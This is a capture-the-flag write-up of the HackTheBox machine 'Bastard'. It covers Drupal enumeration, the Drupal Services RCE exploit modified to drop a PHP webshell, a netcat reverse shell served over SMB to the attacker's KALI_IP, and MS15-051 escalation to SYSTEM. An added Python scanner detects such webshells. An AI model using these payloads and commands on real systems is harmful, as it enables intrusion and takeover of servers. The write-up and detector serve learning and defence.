Bastard
A medium box from HackTheBox: use a vulnerability in a Drupal plugin to get initial access, then a kernel exploit for privesc.
Recon
Regular nmap
sudo nmap -sC -sV -oA nmap/init 10.10.10.9
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 7.5
|_http-generator: Drupal 7 (http://drupal.org)
| http-methods:
|_ Potentially risky methods: TRACE
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt
|_/LICENSE.txt /MAINTAINERS.txt
|_http-server-header: Microsoft-IIS/7.5
|_http-title: Welcome to 10.10.10.9 | 10.10.10.9
135/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
On port 80 there is a Drupal instance, running Drupal 7
Next up, gobuster for directories
gobuster dir -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt --url http://10.10.10.9
Don't find anything interesting immediately, but the presence of /rest/ will be important later
Then gobuster for files
gobuster dir -w /usr/share/seclists/Discovery/Web-Content/raft-medium-files.txt --url http://10.10.10.9
And find a /changelog.txt on the webroot, exposing that the version of Drupal is 7.54
For a more specific scan, run droopescan to enumerate the plugins running on the server
droopescan scan drupal -u 10.10.10.9
This one takes a long time to complete (almost 36 minutes), but eventually get the output
[+] Themes found:
seven http://10.10.10.9/themes/seven/
garland http://10.10.10.9/themes/garland/
[+] Possible interesting urls found:
Default changelog file - http://10.10.10.9/CHANGELOG.txt
Default admin - http://10.10.10.9/user/login
[+] Possible version(s):
7.54
[+] Plugins found:
ctools http://10.10.10.9/sites/all/modules/ctools/
http://10.10.10.9/sites/all/modules/ctools/CHANGELOG.txt
http://10.10.10.9/sites/all/modules/ctools/changelog.txt
http://10.10.10.9/sites/all/modules/ctools/CHANGELOG.TXT
http://10.10.10.9/sites/all/modules/ctools/LICENSE.txt
http://10.10.10.9/sites/all/modules/ctools/API.txt
libraries http://10.10.10.9/sites/all/modules/libraries/
http://10.10.10.9/sites/all/modules/libraries/CHANGELOG.txt
http://10.10.10.9/sites/all/modules/libraries/changelog.txt
http://10.10.10.9/sites/all/modules/libraries/CHANGELOG.TXT
http://10.10.10.9/sites/all/modules/libraries/README.txt
http://10.10.10.9/sites/all/modules/libraries/readme.txt
http://10.10.10.9/sites/all/modules/libraries/README.TXT
http://10.10.10.9/sites/all/modules/libraries/LICENSE.txt
services http://10.10.10.9/sites/all/modules/services/
http://10.10.10.9/sites/all/modules/services/README.txt
http://10.10.10.9/sites/all/modules/services/readme.txt
http://10.10.10.9/sites/all/modules/services/README.TXT
http://10.10.10.9/sites/all/modules/services/LICENSE.txt
image http://10.10.10.9/modules/image/
profile http://10.10.10.9/modules/profile/
php http://10.10.10.9/modules/php/
[+] Scan finished (0:35:53.627982 elapsed)
Then, running searchsploit for drupal 7, there is an exploit involving Drupal 7.x and the Services plugin
searchsploit drupal 7
...
Drupal 7.x Module Services - Remote Code Execution | php/webapps/41564.php
...
Exploitation
Download the exploit to the current directory
searchsploit -m php/webapps/41564.php
Firing it immediately, it doesn't work with -h or when giving it a target, so read up on it using the writeup link inside the file
At the end of the writeup, the authors write - “…one has to guess or find the endpoint URL, which mitigates the vulnerability a bit”
So inside the file, change the endpoint variable from "endpoint_path=/rest_endpoint" to the one found in the gobuster enumeration: "endpoint_path=/rest"
Since the exploit writes a file to the web root, can change the default PHP file to a webshell
Changing
$file = [
'filename' => 'dixuSOspsOUU.php',
'data' => '<?php eval(file_get_contents(\'php://input\')); ?>'
];
To
$file = [
'filename' => 'rev.php',
'data' => '<?php system($_GET[\'cmd\']); ?>'
];
Then change the target URL within the file as well (the exploit expects a quoted string)
$url = 'http://10.10.10.9';
Then fire the exploit with
php 41564.php
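As an added example (not from the writeup or the exploit's author), a small Python scanner a defender could run over the Drupal webroot to catch the kind of PHP webshell this exploit drops; the file names, sample contents and temporary webroot below are constructed.

```python
"""Added example (not part of the original writeup): scan a Drupal webroot for
PHP webshells like the ones the Services exploit drops (rev.php, the default
dixuSOspsOUU.php). Sample files and paths below are constructed."""
import os
import re
import tempfile

# Signatures for the two payloads shown in the writeup plus common variants:
# code execution fed directly from request input.
SIGNATURES = {
    "eval-of-raw-request-body": re.compile(
        r"eval\s*\(\s*file_get_contents\s*\(\s*['\"]php://input['\"]"),
    "shell-exec-of-request-param": re.compile(
        r"\b(system|passthru|shell_exec|exec|popen)\s*\(\s*\$_(GET|POST|REQUEST)\b"),
}

def scan_php_file(path):
    """Return the names of the signatures that match the file's contents."""
    with open(path, "r", encoding="utf-8", errors="ignore") as fh:
        body = fh.read()
    return [name for name, rx in SIGNATURES.items() if rx.search(body)]

def scan_webroot(webroot):
    """Walk a webroot; return {relative_path: [signatures]} for every .php
    file that matches at least one signature."""
    hits = {}
    for dirpath, _dirs, files in os.walk(webroot):
        for fname in files:
            if not fname.lower().endswith(".php"):
                continue
            full = os.path.join(dirpath, fname)
            matched = scan_php_file(full)
            if matched:
                hits[os.path.relpath(full, webroot)] = matched
    return hits

def demo():
    """Build a constructed webroot holding one benign Drupal file and the two
    payloads from the writeup, scan it, and return the result."""
    root = tempfile.mkdtemp(prefix="drupal-root-")
    samples = {
        "index.php": "<?php require_once 'includes/bootstrap.inc'; ?>",
        "dixuSOspsOUU.php": "<?php eval(file_get_contents('php://input')); ?>",
        "rev.php": "<?php system($_GET['cmd']); ?>",
    }
    for name, content in samples.items():
        with open(os.path.join(root, name), "w", encoding="utf-8") as fh:
            fh.write(content)
    return scan_webroot(root)
```

On a real box, point scan_webroot at the IIS webroot (here C:\inetpub\drupal-7.54) and pair it with a check for PHP files newer than the last deployment, since attackers rarely keep the default file name.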
Now with the webshell, can use the Windows version of netcat, nc.exe, to get a reverse shell
Copy nc.exe to the working directory, then use impacket's smbserver.py to share it so the target can reach it via the webshell
/opt/impacket/examples/smbserver.py share .
And then use the webshell to get a reverse shell by setting up a netcat listener on port 4444 and going to
http://10.10.10.9/rev.php?cmd=\\KALI_IP\share\nc.exe -e cmd.exe KALI_IP 4444
To catch the reverse shell and get the user flag
Now on the box, run systeminfo and see that no hotfixes are applied, so a kernel exploit should be easy
I'll opt to use MS15-051, since it's easy and has an executable ready to go on GitHub
Transferring it to the victim via the SMB server again, run it with cmd.exe as the command to get a shell as nt authority\system, i.e. root!
C:\inetpub\drupal-7.54> exploit.exe cmd.exe
C:\inetpub\drupal-7.54> whoami
nt authority\system